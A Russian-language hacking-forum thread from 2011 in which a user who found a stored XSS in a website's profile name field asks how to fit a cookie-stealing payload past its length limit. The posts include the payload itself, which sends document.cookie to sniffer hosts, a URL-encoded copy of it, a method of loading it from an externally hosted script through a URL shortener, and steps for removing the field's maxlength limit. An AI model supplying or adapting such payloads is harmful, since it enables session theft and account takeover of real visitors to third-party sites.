HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу XSS Слишком длинный.
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.11.2011, 12:54
Groove
Guest
Сообщений: n/a
Провел на форуме:
59158

Репутация: 2
По умолчанию
Всем привет , у меня такой необычный вопрос , на одном сайте я нашел

Цитата:
Сообщение от None  
xss
уязвимость , допустим я вставляю

Цитата:
Сообщение от None  
">alert('xss')
в поля (Имя)

Все проходит успешно и при заходе на данный профиль мне пишет что уязвимость есть , теперь я хочу вставить следующий скрипт

Цитата:
Сообщение от None  
[COLOR="Red"]img = new Image(); img.src = "http://sniffer.site.ru/blablabls.gif?"+document.cookie;
Но дело в том что при вставки данного xss в этом поле она не сохраняется , а причина тому слишком много символов , как я выяснил .

Собственно вопрос : Как можно сделать короче (сократить, уменьшить )

Цитата:
Сообщение от None  
img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__1010.gif?"+document.cookie;
или зашифровать , но чтобы смысл данного скрипта оставался одним и тем же?

Спасибо за внимание .
 
Ответить с цитированием

  #2  
Старый 29.11.2011, 13:24
tabletkO
Guest
Сообщений: n/a
Провел на форуме:
28093

Репутация: 11
По умолчанию
Спрятать можно:

Код HTML:
HTML:
%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%73%6E%69%66%66%65%72%2E%78%61%6B%6E%65%74%2E%72%75%2F%73%6D%69%6C%65%73%2F%69%6D%67%5F%5F%31%30%31%30%2E%67%69%66%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E
Убери блокнотом(ctrl+h) все пробелы и в дело!
 
Ответить с цитированием

  #3  
Старый 29.11.2011, 13:33
Fepsis
Постоянный
Регистрация: 17.09.2008
Сообщений: 562
Провел на форуме:
6962560

Репутация: 536


По умолчанию
возможно можно и без (type="text/javascript") не помню точно...

а в твой_скрипт.js пиши что надо, ну типа

Цитата:
Сообщение от None  
img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__1010.gif?"+document.cookie;
 
Ответить с цитированием

  #4  
Старый 29.11.2011, 13:48
Groove
Guest
Сообщений: n/a
Провел на форуме:
59158

Репутация: 2
По умолчанию
Не помогло. Мне нужно так чтобы за это поле , скрипт не вылазил.
 
Ответить с цитированием

  #5  
Старый 29.11.2011, 14:08
tabletkO
Guest
Сообщений: n/a
Провел на форуме:
28093

Репутация: 11
По умолчанию
URL в студио вида si[это не я]te.ru/script.php?vuln_param=">alert('xss')
 
Ответить с цитированием

  #6  
Старый 29.11.2011, 15:33
Groove
Guest
Сообщений: n/a
Провел на форуме:
59158

Репутация: 2
По умолчанию
Цитата:
Сообщение от tabletkO  
tabletkO said:
URL в студио вида si[это не я]te.ru/script.php?vuln_param=">alert('xss')
Я тебя не понял
 
Ответить с цитированием

  #7  
Старый 29.11.2011, 15:34
tabletkO
Guest
Сообщений: n/a
Провел на форуме:
28093

Репутация: 11
По умолчанию
Короче адрес уязвимого сайта давай =)

TC скинул адрес, но ничего не написал, где уязвимость
 
Ответить с цитированием

  #8  
Старый 29.11.2011, 16:45
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от Groove  
Groove said:
Я тебя не понял
Руководство по пунктам.

1) открываем Opera (именно оперу и никакой другой !!!) и переходим на выбранный сайт

2) Жмём Правой кнопкой - Исходный код страницы

3) Ищем нашу строку с вводом строки и меняем её длину

maxlength="13" на maxlength="1300" к примеру

4) Не выходя из редактирования исходного кода идёшь в левый верхний угол и ищешь там "Применить изменения", что собсно и жмёшь

5) Переходишь на вкладку с сайтом и вбиваешь всю стоку полностью, без предыдущего ограничения.

Если фильтра в php-коде нет, тебя пропустит
 
Ответить с цитированием

  #9  
Старый 29.11.2011, 23:13
Groove
Guest
Сообщений: n/a
Провел на форуме:
59158

Репутация: 2
По умолчанию
Цитата:
Сообщение от BigBear  
BigBear said:
Руководство по пунктам.
1) открываем Opera (именно оперу и никакой другой !!!) и переходим на выбранный сайт
2) Жмём Правой кнопкой - Исходный код страницы
3) Ищем нашу строку с вводом строки и меняем её длину
maxlength="13" на maxlength="1300" к примеру
4) Не выходя из редактирования исходного кода идёшь в левый верхний угол и ищешь там "Применить изменения", что собсно и жмёшь
5) Переходишь на вкладку с сайтом и вбиваешь всю стоку полностью, без предыдущего ограничения.
Если фильтра в php-коде нет, тебя пропустит
Большое спасибо , сейчас проверим .
 
Ответить с цитированием

  #10  
Старый 29.11.2011, 23:31
|qbz|
Познающий
Регистрация: 25.12.2009
Сообщений: 95
Провел на форуме:
750417

Репутация: 51
По умолчанию
Если сервер рубит длину, то не поможет. Делается проще пареной репы же:

1) делаем файл 1.js

2) в него пишем img = new Image(); img.src = "http://sniffer.site.ru/blablabls.gif?"+document.cookie;

3) заливаем куда угодно на любой хостинг, например на фрихост какой-нибудь

4) идем на u.to, запихиваем туда ссылку на файл 1.js, получаем что-то типа http://u.to/abc123

5) вставляем на сайте вот такой код:

Если нужно еще меньше, то пишем в асю 352223797 - скажу платное решение.
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ